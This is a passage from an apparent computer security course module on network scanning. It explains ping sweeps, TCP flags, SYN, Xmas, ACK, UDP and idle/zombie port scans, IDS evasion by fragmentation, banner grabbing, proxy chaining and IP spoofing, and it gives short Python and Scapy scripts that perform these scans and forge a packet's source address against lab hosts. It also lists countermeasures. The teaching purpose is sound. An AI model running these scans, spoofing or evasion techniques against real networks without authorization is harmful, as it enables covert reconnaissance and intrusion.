packet bounces when sent to the IP address but not when sent to the name, it is an
indication that the system cannot resolve the name to the specific IP address.

Using Nmap you can perform a ping sweep. The ping sweep determines the IP addresses of live
hosts in a certain area. This provides information about the IP addresses of the live host, as well
as its MAC address. It allows you to scan multiple hosts at the same time and determine active
hosts on the network. I will perform a ping sweep on my local network:

I made a full ping sweep within my local network and found 4 devices connected to my network.
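If you want to see what a ping sweep does under the hood, here is a minimal sketch that implements one using only the Python standard library and the system "ping" command (it assumes a Unix-like system where "ping -c 1 -W 1" is valid, and a hypothetical 192.168.1.0/24 network that you are authorized to probe):

import ipaddress
import subprocess

live_hosts = []
for ip in ipaddress.ip_network("192.168.1.0/24").hosts():
    # one echo request per host, 1 second timeout, output discarded
    result = subprocess.run(
        ["ping", "-c", "1", "-W", "1", str(ip)],
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
    )
    if result.returncode == 0:        # 0 means an ICMP ECHO reply was received
        live_hosts.append(str(ip))

print("Live hosts:", live_hosts)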

Interesting tools for the ping sweep

The determination of live hosts in a target network is the first step in the process of hacking or
pentesting. This can be done using ping sweep tools. There are several ping sweeping tools
available in the market with which you can perform ping sweeps easily. These tools allow you to
determine live hosts by sending ICMP ECHO requests to multiple hosts at a given time. Angry
IP Scanner and Solarwinds Engineer's Toolset are some of the commonly used ping scan
tools.

Search for open ports

Searching for open ports on a target network is vital to successfully completing a
pentesting audit; it is also what malicious hackers do, looking for open ports so they can learn what
types of services are running on them. First, we need to go over some network concepts that
will help us better understand what the search for open ports is about. Let me remind you that I
wrote an introductory guide to computer networks, their security and how to design a safer
network, which I recommend you read. Now let's continue...

The Three-Way Handshake

TCP is connection-oriented, which means that a connection must be established before data can be
transferred between applications. This connection is made possible through the Three-Way
Handshake process, which is implemented to establish the connection between the two hosts.

The Three-Way Handshake performs the following procedure to open a communication between devices:

 To initiate a TCP connection, the source (10.0.0.2:62000) sends a SYN packet to the
destination (10.0.0.3:21).
 The destination, upon receiving the SYN packet sent by the source, responds by
sending a SYN/ACK packet back to the source.
 This SYN/ACK packet confirms to the source that its first SYN packet arrived.
 Finally, the source sends an ACK packet for the SYN/ACK packet sent by the
destination.
 This results in an "OPEN" connection that allows communication between the source and
the destination until either of them issues a "FIN" packet or an "RST" packet to
close the connection.
The TCP protocol maintains state connections for all connection-oriented protocols over the
Internet, and works just like ordinary telephone communication, in which one picks up a
telephone receiver, listens to a dial tone and dials a number that activates the doorbell at the other
end until a person picks up the receiver and says "Hello."

Establishing a connection in TCP

As discussed above, a TCP connection is established based on the three-way handshake method.
The name of the connection method makes it clear that the establishment of the connection is
carried out in three main steps.

The following sequence shows the process of a TCP connection that is being established in 3
frames:

 Frame 1: as you can see in the first frame, the client, NTW3, sends a SYN segment (TCP
.... S). This is a request to the server to synchronize the sequence numbers. It specifies its
initial sequence number (ISN), which is incremented by 1 (8221821 + 1 = 8221822) and
sent to the server. To initialize a connection, the client and the server must synchronize
each other's sequence numbers. There is also an option to set the maximum segment
size (MSS), defined by the length (len: 4); this option communicates the
maximum segment size the sender wishes to receive. The Acknowledgment field
(ack: 0) is set to zero because this is the first part of the three-way handshake.

 Frame 2: in the second frame, the server, BDC3, sends an ACK and a SYN in this
segment (TCP .A..S.). In this segment, the server acknowledges the client's request for
synchronization. At the same time, the server also sends its own request to the client for
synchronization of its sequence numbers. There is one big difference in this segment:
the server transmits an acknowledgment number (8221823) to the client. The
acknowledgment is proof to the client that the ACK is specific to the SYN the client
initiated. The process of acknowledging the client's request allows the server to increment the
client's sequence number by one and use it as its acknowledgment number.

 Frame 3: in the third frame, the client sends an ACK in this segment (TCP .A....). In this
segment, the client acknowledges the server's request for synchronization. The client uses
the same algorithm the server implemented to provide an acknowledgment number. The
client's acknowledgment of the server's synchronization request completes the process of
establishing a reliable connection: the three-way handshake.
Flags in a TCP communication

Standard TCP communication is governed by flags in the TCP packet header. These
flags control the connection between hosts and give instructions to the system. The
following are the TCP communication flags:

 SYN: short for Synchronize; it announces the transmission of a new sequence number.
 ACK: short for Acknowledgement; it confirms receipt of the transmission and
identifies the next expected sequence number.
 PSH: short for Push; it tells the receiving system to deliver the buffered data to the application immediately.
 URG: short for Urgent; it indicates that the data contained in the packet should be processed as
soon as possible.
 FIN: short for Finish; it announces that no further transmissions will be sent to the remote
system.
 RST: short for Reset; it resets a connection.

The SYN scan mainly deals with three of the indicators, namely, SYN, ACK and RST. You can
use these three indicators to gather illegal information from the servers during the enumeration
process.

Scanning of IPV6 Networks
IPv6 increases the size of the IP address space from 32 bits to 128 bits to support more levels of
address hierarchy. Traditional network scanning techniques are less feasible due to the larger
search space (64 bits of host address space, or 2^64 addresses) that IPv6 provides in a subnet.
Scanning an IPv6 network is more difficult and complex than scanning IPv4 and, in addition, some
scanning tools do not fully support ping sweeps on IPv6 networks. Attackers
must instead collect IPv6 addresses from network traffic, recorded logs, or "Received from:" and other
header lines in archived email or news messages in order to identify IPv6 addresses for subsequent port
scanning. However, if an attacker can compromise one host in the subnet, he can poll the
"all hosts" link-local multicast address to find the large number of hosts in that subnet.
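A minimal sketch of that "all hosts" multicast trick: on a Linux host that is already inside the IPv6 subnet, pinging ff02::1 makes the link-local neighbors reveal themselves (the interface name eth0 is an assumption; adjust it to your own lab environment):

import subprocess

# ping the link-local "all hosts" multicast group on interface eth0
result = subprocess.run(
    ["ping", "-6", "-c", "2", "ff02::1%eth0"],
    capture_output=True, text=True
)
print(result.stdout)               # replies arrive from the link-local addresses of live hosts

# the neighbor cache then contains the discovered addresses
neighbors = subprocess.run(["ip", "-6", "neigh"], capture_output=True, text=True)
print(neighbors.stdout)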

Interesting tools

 Nmap is a tool that can be used for ping scans, also known as host discovery. Using this
tool you can determine the hosts live in a network. Perform ping scans by sending ICMP
ECHO requests to all hosts on the network. If the host is live, the host sends an ICMP
ECHO response. This scan is useful to locate active devices or to determine if ICMP is
going through a firewall, we will see more of this in the practice of this module, in this
case we will use the graphical interface of Nmap called Zenmap.
 HPing2/HPing3 is a command-line oriented TCP/IP packet assembler and analyzer that sends
ICMP echo requests and supports the TCP, UDP, ICMP and raw-IP protocols. It has a
traceroute mode and allows you to send files over covert channels. It has the ability
to send custom TCP/IP packets and display target responses in the style of ping with
ICMP replies. It handles fragmentation and arbitrary packet sizes and bodies, and can
be used to transfer files encapsulated under the supported protocols. It supports idle
host scanning. IP spoofing and network/host analysis can be used to perform an
anonymous probe for services.

An attacker studies the behavior of an inactive host to obtain information about the target, such
as the services offered by the host, the ports that support the services, and the operating system
of the target. This type of scan is a predecessor of a heavier test or direct attack.

The following are some of the features of HPing2 / HPing3:

 Determines if the host is active even when the host blocks ICMP packets.
 Advanced port scanning and test network performance using different protocols, packet
sizes, TOS and fragmentation.
 Manual path MTU discovery
 Firewalk-like usage that allows the discovery of open ports behind firewalls
 Remote recognition of the operating system
 TCP / IP stack audit

We will see more of these tools in the practice of this module, of the computer security course.

Frequent techniques used in a computer network scan

Next we will talk about the most frequent techniques used by computer security professionals or
malicious hackers who need to have more information about your network or that of an
organization, I remind you that in the practice of this computer security course we will see these
techniques with more details, through a tutorial and examples in a controlled environment.

Scanning is the process of gathering information about systems that are alive and responding in
the network; port scanning techniques are designed to identify open ports on a specific server or
host. This is often used by administrators to verify the security policies of their networks and by
attackers to identify services running on a host with the intention of compromising it.

The different types of scanning techniques used include:

 TCP Connect/Full open scan
 Stealth scans: SYN Scan (Half open scan); XMAS scan, FIN scan, NULL scan
 IDLE scan
 ICMP echo scan / list scan
 SYN / FIN scan using IP fragments
 UDP scan
 Inverse scanning of TCP flags
 Scanning of ACK flag

TCP Connect / Full Open Scan
It is one of the most reliable forms of TCP scanning. The connect() system call provided by
the OS is used to open a connection to each interesting port on the machine. If the port is
listening, connect() will succeed; otherwise, the port is not reachable.

In the TCP three-way handshake, the client sends a SYN flag, which is acknowledged with a SYN+ACK
flag by the server, which in turn is acknowledged by the client with an ACK flag to complete
the connection. Each end can establish and terminate the connection individually.
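Here is a minimal TCP connect scan sketch using only the Python standard library; connect_ex() performs the full three-way handshake when the port is open (the target scanme.nmap.org and the port list are only examples of a host you are allowed to scan):

import socket

target = "scanme.nmap.org"
for port in (21, 22, 25, 80, 443):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(1.5)
        # connect_ex returns 0 when the connection (handshake) succeeds
        if s.connect_ex((target, port)) == 0:
            print(f"Port {port}/tcp open")
        else:
            print(f"Port {port}/tcp closed or filtered")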

Stealth Scan
The stealth scan sends a single frame to a TCP port without any TCP protocol exchange or
additional packet transfers. This is a type of scan that sends a single frame with the expectation
of a single response. The half-open scan partially opens a connection, but halts halfway. This is
also known as a SYN scan because it only sends the SYN packet. This prevents the service from
being notified of the incoming connection. TCP SYN scans or half-open scanning are a stealth
port scanning method.

The three-way handshake methodology is also implemented in the stealth scan. The
difference is that in the last stage the remote ports are identified by examining the packets
entering the interface and terminating the connection before a new one is initiated.

It works in the following way:

1. To initiate the scan, the client sends a single "SYN" packet to the destination
server on the corresponding port.
2. The server's response determines how the stealth scan proceeds.
3. If the server returns a "SYN/ACK" response packet, the port is assumed to be in
the "OPEN" state.
4. If, on the contrary, the server responds with an "RST" packet, the client interprets
the port as closed or inaccessible.
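A minimal SYN (half-open) scan sketch with Scapy, following the steps above (it requires root privileges; the target address and port are placeholders for a lab machine you are authorized to scan):

from scapy.all import IP, TCP, sr1, send

target, port = "192.168.56.101", 80           # hypothetical lab machine

syn = IP(dst=target) / TCP(dport=port, flags="S")
reply = sr1(syn, timeout=2, verbose=0)

if reply is None:
    print("No response: port filtered or host down")
elif reply.haslayer(TCP) and (reply[TCP].flags & 0x12) == 0x12:   # SYN+ACK
    print(f"Port {port}/tcp open")
    # tear the half-open connection down without completing the handshake
    send(IP(dst=target) / TCP(dport=port, flags="R"), verbose=0)
elif reply.haslayer(TCP) and reply[TCP].flags & 0x04:             # RST
    print(f"Port {port}/tcp closed")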

Xmas Scan
The Xmas scan is a port scanning technique in which a TCP frame with flags such as FIN, URG and
PSH set is sent to a remote device. If the target port is closed, the remote system responds with an
RST. You can use this port scanning technique to scan large networks and find out which hosts are
up and what services they offer. When all the TCP flags are set, some systems hang, so the
combination most frequently set is the URG-PSH-FIN "nonsense" pattern. This scan only works against
systems whose TCP/IP stack complies with RFC 793.
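A minimal Xmas scan sketch with Scapy using the FIN, PSH and URG flags (root privileges required; the target and port are lab placeholders). As described above, no reply suggests an open or filtered port, while an RST indicates a closed port:

from scapy.all import IP, TCP, sr1

target, port = "192.168.56.101", 80
xmas = IP(dst=target) / TCP(dport=port, flags="FPU")   # FIN + PSH + URG
reply = sr1(xmas, timeout=2, verbose=0)

if reply is None:
    print(f"Port {port}/tcp open or filtered")
elif reply.haslayer(TCP) and reply[TCP].flags & 0x04:  # RST
    print(f"Port {port}/tcp closed")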
Inverse TCP flag scan
Attackers send TCP probe packets with a single TCP flag (FIN, URG or PSH) set, or with no
flags at all. If the server does not respond, it means the port is open; if it responds
with an RST packet, it means the port is closed.

Scanning of ACK flag probe
Attackers send TCP probe packets with ACK indicator set to a remote device and then analyze
the header information (TTL and WINDOW field) of the received RST packets to determine if
the port is open or closed.

If it is open:

 If the TTL value of the RST packet in a particular port is less than the limit value of 64,
then that port is open.

 If the WINDOW value of the RST packet on a particular port has a non-zero value, then
that port is open.

If it is closed:

 If the TTL value of the RST packet is greater than 64, or its WINDOW value is zero, the port is considered closed.

The ACK flag probe scan can also be used to check the target's filtering system:

 Attackers send an ACK probe packet with a random sequence number; no response
means that the port is filtered (a stateful firewall is present), while an RST response
means that the port is not filtered.
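A minimal ACK probe sketch with Scapy that applies those rules (root privileges required; the target and port are lab placeholders):

from scapy.all import IP, TCP, sr1

target, port = "192.168.56.101", 80
ack = IP(dst=target) / TCP(dport=port, flags="A", seq=12345)
reply = sr1(ack, timeout=2, verbose=0)

if reply is None:
    print(f"Port {port}/tcp filtered (no RST came back)")
elif reply.haslayer(TCP) and reply[TCP].flags & 0x04:       # RST received
    # per the rules above, a non-zero WINDOW in the RST hints that the port is open
    state = "open" if reply[TCP].window > 0 else "unfiltered"
    print(f"Port {port}/tcp {state} (RST received, window={reply[TCP].window})")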

IDLE/IPID header scan

Most network servers listen on TCP ports, such as web servers on port 80 and mail servers on
port 25, the port is considered "open" if an application is listening on the port.

 One way to determine if a port is open is to send a "SYN" packet to the port.
 The destination machine will send a "SYN | ACK" packet (acknowledgment of the
session) if the port is open, and an "RST" packet (restart) if the port is closed.
 A machine that receives an unsolicited SYN | ACK packet will respond with an RST. An
unsolicited RST will be ignored
 Each IP packet on the Internet has a "fragment identification" number (IPID)
 The operating system increases the IPID for each packet sent, so testing an IPID gives an
attacker the number of packets sent since the last test
UDP Scan

UDP port scanners use the UDP protocol instead of TCP, and scanning UDP can be more difficult than
scanning TCP. You can send a packet, but you cannot directly determine whether the host is live, down or
filtered. However, there is one ICMP message you can use to determine whether ports are open or closed:
if you send a UDP packet to a port with no application bound to it, the IP stack returns an
ICMP "port unreachable" packet. If a port returns this ICMP error, it is closed, while ports
that do not respond are either open or filtered by the firewall.

This happens because open ports are not required to send an acknowledgment in response to a probe,
and closed ports are not even required to send an error packet. UDP is designed to send data without
acknowledging receipt of the packets you send, which complicates the scan considerably, since we
depend on a response to know what state the ports are in.

 Open port: the system does not respond with a message when the port is open.
 Closed port: if a UDP packet is sent to a closed port, the system responds with an
ICMP "port unreachable" message. Spyware, trojans and other malicious programs often
use UDP ports.
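A minimal UDP scan sketch with Scapy (root privileges required; the target and port are lab placeholders). A "port unreachable" ICMP error means closed; silence means open or filtered, exactly as described above:

from scapy.all import IP, UDP, ICMP, sr1

target, port = "192.168.56.101", 53
probe = IP(dst=target) / UDP(dport=port)
reply = sr1(probe, timeout=2, verbose=0)

if reply is None:
    print(f"Port {port}/udp open or filtered (no response)")
elif reply.haslayer(ICMP) and reply[ICMP].type == 3 and reply[ICMP].code == 3:
    print(f"Port {port}/udp closed (ICMP port unreachable)")
elif reply.haslayer(UDP):
    print(f"Port {port}/udp open (the service answered)")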

In the practice of this module of the computer security course, we will see how to use tools and
test the different types of port scans.

IDLE Scan

Idle scanning is a TCP port scanning method in which spoofed packets are sent to a computer to
discover which services are available, offering a completely blind scan of a remote host. It is
accomplished by impersonating another computer: no packet is sent from your own IP address;
instead, another host, often called a "zombie", is used to scan the remote host and determine the
open ports. This is done by observing the IPID sequence numbers of the zombie host, so if the
remote host checks the IP of the scanning party, it sees the IP of the zombie machine. It is still
a port scan, but the hacker hides his identity.

Step 1: choose a "zombie" and probe its current IP identification number (IPID)

In the first step, you can send a session-establishment "SYN" packet or an IPID probe to determine
whether a port is open or closed. If the port is open, the "zombie" responds with a session request
packet "SYN/ACK". Each IP packet on the Internet has a "fragment identification" number, which is
incremented by one for each packet transmitted. In the diagram above, the zombie responds with
IPID = 31337.

Step 2
 Send a SYN packet to the destination machine (port 80), spoofing the "zombie" IP
address as the source
 If the port is open, the target will send a SYN/ACK packet to the zombie and, in
response, the zombie will send an RST to the target
 If the port is closed, the target will send an RST to the "zombie", but the zombie will not send
anything back.
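In practice, nmap implements this zombie/IDLE scan with the -sI option. A minimal sketch that drives it from Python (assuming nmap is installed, and that both the "zombie" 192.168.56.50 and the target 192.168.56.101 are machines in your own lab):

import subprocess

result = subprocess.run(
    ["nmap", "-Pn", "-sI", "192.168.56.50", "-p", "80,443", "192.168.56.101"],
    capture_output=True, text=True
)
print(result.stdout)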

Countermeasures for port scanning
 Configure the firewall and IDS rules to detect and block probes
 Run the port scanning tools against the hosts on the network to determine if the firewall
properly detects the port scanning activity
 Ensure that the mechanism used for routing and filtering on routers and firewalls,
respectively, can not be circumvented using certain source ports or source routing
methods
 Make sure that the router, the IDS and the firewall firmware are updated to their latest
versions
 Use a set of custom rules to block the network and block unwanted ports in the firewall
 Filter all ICMP messages (i.e., inbound ICMP message types and outbound ICMP type 3
"unreachable" messages) at the firewalls and routers
 Perform the TCP and UDP scan together with the ICMP probes against the IP address
space of your organization to verify the network configuration and its available ports
 Make sure that the anti scanning and anti spoofing rules are set

Scanning ports with IDS evasion
Most IDS evasion techniques rely on fragmented probe packets that are reassembled
once they arrive at the destination host. IDS evasion can also make use of spoofed decoy
hosts that launch network scanning probes alongside the real one.

 Fragmented IP packets: attackers use different fragmentation methods to evade the IDS.
These attacks are similar to session splicing; with the help of fragroute, all the probe
packets flowing toward a server or network can be fragmented. It can also be done
with a port scanner that has fragmentation functionality, such as Nmap. This works
because most IDS sensors do not process large volumes of fragmented packets, as doing so
implies higher CPU and memory consumption at the network sensor level.

Source Routing

Source routing is a technique by which the sender of a packet can specify the route the packet must
take through the network. It assumes that the source of the packet knows the layout of the
network and can specify the best route for the packet.
SYN/FIN scan using IP fragments

The SYN/FIN scan using IP fragments is a modification of the previous scanning methods in which
the probe packets are fragmented. This method arose to avoid the false positives of other
scans caused by a packet filtering device on the target machine. Instead of simply sending a single
probe packet, the TCP header is split across several small IP fragments so that packet filters have
a harder time detecting it. The first fragment of any transmission must include the source and
destination ports of the TCP header (8 octets, 64 bits), and the flags are initialized in the
following fragments; the remote host then reassembles the packet through an Internet Protocol
module that recognizes the fragmented data packets with the help of matching values in the
protocol, source, destination and identification fields.

Firewall

Some firewalls may have rule sets that block IP fragmentation queues in the kernel (such as the
CONFIG_IP_ALWAYS_DEFRAG option in the Linux Kernel), although this is not widely
implemented due to the adverse effect on performance. Because multiple intrusion detection
systems employ signature-based methods to indicate IP-based scanning attempts or TCP headers,
fragmentation can often evade this type of packet detection and filtering. There is a probability of
network problems in the target network.

Banner Grabbing
Banner grabbing, or OS fingerprinting, is a method for determining the operating system that runs
on a remote target system. Banner grabbing is important for hacking, since it gives you a
greater chance of success in an attack: most vulnerabilities are specific to an
operating system, so if you know the OS running on the target system, you can attack the
system by exploiting vulnerabilities specific to that operating system.

Banner grabbing can be carried out in two ways: by reading the banner presented when trying
to connect to a service such as FTP, or by downloading a binary file such as /bin/ls to check the
architecture it was built for.
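The first of those two approaches is easy to see in code. A minimal active banner grabbing sketch using only the standard library: connect to a service and read the first bytes it volunteers (the target and port are placeholders for a host you are authorized to test):

import socket

target, port = "192.168.56.101", 21          # e.g. an FTP service
with socket.create_connection((target, port), timeout=3) as s:
    banner = s.recv(1024).decode(errors="replace")
print(f"Banner on port {port}: {banner.strip()}")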

Banner grabbing relies on fingerprinting techniques. A more advanced fingerprinting
technique depends on stack querying, which sends packets to the host on the network and
evaluates them according to the response. The first stack querying method was designed
around the TCP communication mode, in which the response to connection
requests is evaluated. The next method is known as ISN (Initial Sequence Number)
analysis; it identifies differences in the random number generators found in the TCP stack.
A further method, which uses the ICMP protocol, is known as ICMP response analysis; it consists
of sending ICMP messages to the remote host and evaluating the response. The most recent
method is known as temporal response analysis, which, like the others, examines how the remote
TCP/IP stack responds, in this case focusing on the timing of the responses.
Active Banner Grabbing

 Specially crafted packets are sent to the remote OS and the responses are noted
 The responses are compared with known differences between TCP/IP stack implementations

Passive Banner Grabbing

 Banner grabbing from error messages: error messages provide information such as the
type of server, the type of operating system and the SSL tool used by the remote
target system
 Sniffing network traffic: capturing and analyzing packets from the target allows an attacker to
determine the operating system used by the remote system
 Banner grabbing from page extensions: looking at the file extension in the URL can help determine the
application version

Why is banner grabbing important?

The identification of the operating system used in the destination host allows an attacker to
discover the vulnerabilities that the system has and the exploits that could work in a system to
carry out additional attacks.

Interesting tools:

ID Serve, Netcraft and Netcat are good tools; we will see more of them in the practice of this
computer security course.

Countermeasures to Banner Grabbing

 Show fake banners to deceive attackers
 Disable unnecessary services on the network host to limit the disclosure of information
 Use tools such as ServerMask to disable or change the banner information
 Modify the configuration of the servers so that they do not show the banners on the
operating system

Vulnerability scan
Vulnerability analysis identifies the vulnerabilities and weaknesses of a system and a network in
order to determine how the system could be exploited. Like other security tests, such as open-port
scanning and footprinting, vulnerability testing also helps protect your network by determining the
gaps or vulnerabilities in its current security mechanisms. The same concept can be used by
attackers to find the weak points of the target network. Ethical hackers can use it to
identify the security weaknesses of their target business and fix them before malicious hackers
find and exploit them.

Vulnerability analysis can find vulnerabilities in:

1. Network topology and operating system vulnerabilities
2. Open ports and services in execution
3. Vulnerabilities of applications and services

Nessus

It is a vulnerability scanner, a program that looks for flaws in software. This tool allows a
person to discover specific ways to violate the security of a software product. It reports
vulnerabilities at several levels of detail and then gives you a full report with all the findings.

The characteristics of Nessus are:

 Audit without agent
 Compliance checks
 Content audits
 Custom reports
 Discovery of high-speed vulnerability
 In-depth evaluations
 Audits of mobile devices
 Integration of patch management
 Design and execution of scanning policies

To obtain more accurate and detailed information about Windows-based hosts in a Windows
domain, the user can create a domain group and an account that have remote registry access
privileges. After completing this task, you have access not only to the configuration of the
registry keys, but also to the service pack patches levels, Internet Explorer vulnerabilities and the
services that run on the host.

GFI LanGuard

GFI LanGuard acts as a virtual security consultant, offers patch management, vulnerability
assessment and network audit services. It also assists in asset inventory, change management,
risk analysis and compliance tests.
Characteristics of GFI LanGuard:

 Selectively create vulnerability checks
 Identify security vulnerabilities and take corrective actions
 Create different types of scans and vulnerability tests
 Help ensure that third-party security applications offer optimal protection
 Perform network device vulnerability checks

Qualys FreeScan

Characteristics:

 Scan computers and applications on the Internet or your network
 Test websites and applications for the main risks and malware of OWASP

More tools:

 OpenVAS
 Nexpose
 SAINT
 Core Impact Professional

If you are going to use one of these tools professionally, it is recommended that you
purchase a software license; that way the audit you deliver to your client will be more professional.

Drawings of network diagrams

Network mapping in diagrams helps you identify the topology or architecture of the target
network, the network diagram also helps you track the route to the target host on the network. It
also allows you to understand the position of firewalls, routers and other access control devices.
Based on the network diagram, the attacker can analyze the topology and security mechanisms of
the target network. Once the attacker has this information, he can try to discover the
vulnerabilities or weaknesses of those security mechanisms, and then find his way into the target
network by exploiting those security weaknesses.

The network diagram also helps network administrators manage their networks. Attackers use
network discovery or mapping tools to draw network diagrams of target networks.
Network Topology Mapper

Features:

 Discovery and mapping of network topology
 Export network diagrams to Visio
 Mapping network for regulatory compliance
 Discovery of multi-level networks
 Automatic detection of changes in the network topology

More tools

 NetMapper
 NetworkView
 The Dude

Proxy Server
A proxy is a server that can serve as an intermediary to connect with other computers, you can
use a proxy server in many ways, such as:

 Like a firewall, a proxy protects the local network from external access
 As an IP address multiplexer, a proxy allows multiple computers to connect to the
Internet when it only has one IP address
 To anonymize web browsing (to some extent)
 To filter unwanted content, such as ads or "inappropriate" material (using specialized
proxy servers)
 To provide some protection against hacker attacks
 To save bandwidth

Let's see how a proxy server works

When you use a proxy to request a particular web page from a real server, you first send your
request to the proxy server. The proxy server then sends the request to the real server on your
behalf, mediating between you and the actual server to forward the request and relay the response,
as shown below:
In this process, the proxy relays the communication between the client and the target
application. To take advantage of a proxy server, client programs must be configured so that they
send their requests to the proxy server instead of to the final destination.
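A minimal sketch of that client-side configuration using only the Python standard library (the proxy address 10.0.0.5:8080 is a hypothetical placeholder for a proxy you are allowed to use):

import urllib.request

proxy = urllib.request.ProxyHandler({
    "http":  "http://10.0.0.5:8080",
    "https": "http://10.0.0.5:8080",
})
opener = urllib.request.build_opener(proxy)

with opener.open("http://example.com/") as response:
    # the target web server sees the proxy's IP address, not ours
    print(response.status, len(response.read()), "bytes received")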

Why do hackers use Proxies?

For a hacker, attacking a particular system is easy; hiding the source of the attack is not, so the main
challenge for an attacker is to hide his identity so that no one can trace him. To hide his identity,
the attacker uses a proxy server. The main reason for using a proxy is to avoid leaving evidence
of the attack: with the help of the proxy server, an attacker can mask his IP address so that
he can hack into a computer system with less fear of legal repercussions. When the attacker
uses a proxy to connect to the destination, the source address of the proxy will be recorded in the
server logs instead of the attacker's actual source address.

In addition to this, the reasons why attackers use proxy servers include:

 The attacker appears in the log files of a victim server with a false source address of the
proxy instead of the actual address of the attacker.
 To remotely access intranets and other website resources that are normally out of bounds
 To interrupt all requests sent by an attacker and transmit them to a third destination,
therefore, victims can only identify the address of the proxy server.
 To use multiple proxy servers to scan and attack, making it difficult for administrators to
trace the true source of attack

Examples of use of proxies in computer attacks

Many proxies are intentionally left open for easy access. Anonymous proxies hide the real IP
address (and sometimes other information) from the websites the user visits; there are two kinds,
anonymous proxy servers and web-based anonymizers.

Let's look at the different ways an attacker can use proxies to commit attacks against the target.

 Case 1: the attacker makes attacks directly without using proxy. The attacker may be at
risk of being tracked while the server logs that it contains information about the IP
address of the source.
 Case 2: the attacker uses a proxy to reach the destination application. In this case, the
server log will show the IP address of the proxy instead of the IP address of the attacker,
hiding his identity, so the attacker runs a minimal risk of being caught. This gives the
attacker the anonymity he wants on the Internet.
 Case 3: to be even more anonymous on the Internet, the attacker can use the proxy chaining
technique to reach the target application. If he or she uses proxy chaining, it is very
difficult to trace the originating IP address. Proxy chaining is the technique of using
multiple proxies to reach the target.
Proxy chaining (chaining of proxies)

Proxy chaining helps you to be more anonymous on the Internet; your anonymity depends on the
number of proxies used to reach the target application. The more proxy servers you use, the more
anonymous you become on the Internet, and vice versa.

When the attacker makes a request, it first goes to the proxy1 server, and proxy1 in turn requests
another server, proxy2. Proxy1 removes the user's identifying information and passes the
request to the next proxy server, which may in turn request yet another proxy server, proxy3, and
so on, up to the destination server, where the request is finally delivered. A chain of proxy
servers is thus formed to reach the destination server; as you would expect, this affects performance.

Tool: Tor

Tor allows you to protect your privacy and defend against network surveillance and traffic
analysis

Anonymizers

An anonymizer removes all identifying information from the user's computer while the user
browses the Internet. Anonymizers make activity on the Internet untraceable and also allow you
to bypass Internet censorship.

Why use an anonymizer?

 Privacy and anonymity
 Protect from online attacks
 Access restricted content
 Bypass IDS and firewall rules

Tool: Tails
Tails is a live operating system, which the user can start on any computer from a DVD, USB
device or SD card

Its goal is to preserve your privacy and anonymity and to help you:

 Use the Internet anonymously and avoid censorship
 Do not leave traces on the computer
 Use state-of-the-art cryptographic tools to encrypt files, emails and instant messages

HTTP tunneling techniques

HTTP Tunneling is another technique that allows you to use the Internet despite restrictions
imposed by the firewall. The HTTP protocol acts as a wrapper for communication channels.

An attacker uses HTTP tunneling software to perform HTTP tunneling; it is a client-server
application used to communicate through the HTTP protocol. This software creates an
HTTP tunnel between two machines, optionally using a web proxy. The technique involves sending
POST requests to an "HTTP server" and receiving replies.

The attacker uses the client application of the HTTP tunnel software installed on his system to
communicate with other machines. All requests sent through the HTTP tunnel client application
go through the HTTP protocol.

The HTTP tunneling technique is used in network activities such as:

1. Video and audio transmission
2. Remote procedure calls and network management
3. Intrusion detection alerts
4. Firewalls

Countermeasures to the tunnels in HTTP

 Encrypt all network traffic using cryptographic network protocols such as IPsec, TLS,
SSH and HTTPS.
 Use multiple firewalls that provide a multilayer protection depth
 Do not trust IP-based authentication
 Use a random initial sequence number to avoid IP spoofing attacks based on the spoofing
of the sequence number
 Input filtering: Use routers and firewalls on the perimeter of your network to filter
incoming packets that appear to come from an internal IP address
 Output filtering: filter all outgoing packets with an invalid local IP address as the source
address.
Tools

 Super Network Tunnel
 HTTP-Tunnel

IP spoofing
IP spoofing refers to changing the source IP address so that the attack appears to come from
someone else; when the victim replies, the response goes back to the spoofed address and not to the
attacker's actual address.
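A minimal illustration of the idea with Scapy, in which the source address of the packet is forged (root privileges required; this only makes sense in an isolated lab, since any reply goes to the spoofed address, not to you, and all addresses below are lab placeholders):

from scapy.all import IP, TCP, send

spoofed_src = "192.168.56.200"     # address we pretend to be
target      = "192.168.56.101"

pkt = IP(src=spoofed_src, dst=target) / TCP(dport=80, flags="S")
send(pkt, verbose=0)               # the victim's logs will show 192.168.56.200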

Detect IP spoofing with direct TTL probes

 Send a packet to the host from which the suspicious (possibly spoofed) packet claims to come,
so that it triggers a reply, and compare the TTL of that reply with the TTL of the suspicious
packet; if the TTL in the reply is not the same as in the packet being verified, the packet is
spoofed. This technique is successful when the attacker is in a different subnet from the victim.

Detect IP spoofing with the IP identification number

 Send a probe to the host from which the suspicious (possibly spoofed) traffic claims to come,
so that it triggers a reply, and compare its IP identification number with that of the suspicious traffic
 If the IPIDs are not close in value to that of the packet being checked, the suspicious traffic
was spoofed
 This technique is successful even if the attacker is on the same subnet

Detect IP spoofing with the TCP flow control method

 Attackers sending spoofed TCP packets will not receive the target's SYN-ACK
packets
 Therefore, attackers cannot respond to changes in the size of the congestion window
 If the received traffic continues after the window size is exhausted, the packets were most
likely spoofed

Countermeasures to IP spoofing

 Encrypt all network traffic.
 Use multiple firewalls that provide a multilayer protection depth
 Do not trust IP-based authentication
 Use a random initial sequence number to avoid IP spoofing attacks based on the spoofing
of the sequence number
 Input filtering: Use routers and firewalls on the perimeter of your network to filter
incoming packets that appear to come from an internal IP address
 Output Filtering: filter all outgoing packets with an invalid local IP address as the
source address.

Scanning in the Pentesting
A network penetration test helps you determine the security posture of the network by
identifying live systems, discovering open ports and the associated services, and grabbing banners
from a remote location, simulating an attempt to hack the network. You should scan or test the
network in every possible way to ensure that no security hole is overlooked.

Once you have finished with the penetration test, you must document all the findings
obtained in each test stage to help system administrators to:

 Close unknown open ports that are discovered if they are not necessary
 Disable unnecessary services
 Hide or customize banners
 Troubleshoot service configuration errors
 Calibrate firewall rules to impose more restrictions

1. Host Discovery
The first step of a network penetration test is to detect the live hosts on the target network.
You can try to detect the live, reachable hosts on the target network using
network scanning tools such as Nmap; keep in mind that it is difficult to detect live hosts behind a firewall.
2. Port Scan
Perform port scanning using tools such as nmap, these tools will help you poll a server or
host on the target network for open ports. The open ports are the accesses for the
attackers to install malware in a system, therefore, you must verify if there are open ports
and close them if it is not necessary.
3. Banner grabbing or operating system recognition
Using tools such as Nmap, determine the operating system that runs on the
target host of the network and its version. Once you know the version and
operating system running on the target system, look for and exploit vulnerabilities
related to that operating system, try to gain control over the system, and assess whether
the entire network could be endangered.
4. Vulnerability analysis
Examine the network for vulnerabilities using network vulnerability scanning tools such
